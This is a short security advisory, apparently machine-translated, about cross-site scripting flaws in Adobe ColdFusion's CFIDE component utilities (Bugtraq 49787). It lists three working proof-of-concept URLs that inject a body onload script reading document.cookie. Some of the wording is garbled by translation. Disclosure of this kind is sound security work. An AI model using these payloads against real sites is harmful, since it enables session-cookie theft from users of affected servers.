Release date:
Updated on:
Affected Systems:
Adobe ColdFusion
Description:
--------------------------------------------------------------------------------
Bugtraq id: 49787
Adobe ColdFusion is a dynamic Web server.
Adobe ColdFusion has multiple cross-site scripting vulnerabilities. Remote attackers can exploit these vulnerabilities to execute arbitrary script code on the affected site and steal cookie authentication creden.
<* Source: MustLive (mustlive@websecurity.com.ua)
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
MustLive (mustlive@websecurity.com.ua) provides the following test methods:
Http://example.com/CFIDE/componentutils/componentdetail.cfm? Component = % 3 Cbody % 20 onload = alert (document. cookie) % 3E
Http://example.com/CFIDE/componentutils/cfcexplorer.cfc? Method = getcfcinhtml & amp; name = % 3 Cbody % 20 onload = alert (document. cookie) % 3E
Http://example.com/CFIDE/componentutils/cfcexplorer.cfc? Method = % 3 Cbody % 20 onload = alert (document. cookie) % 3E
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Adobe
-----
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.adobe.com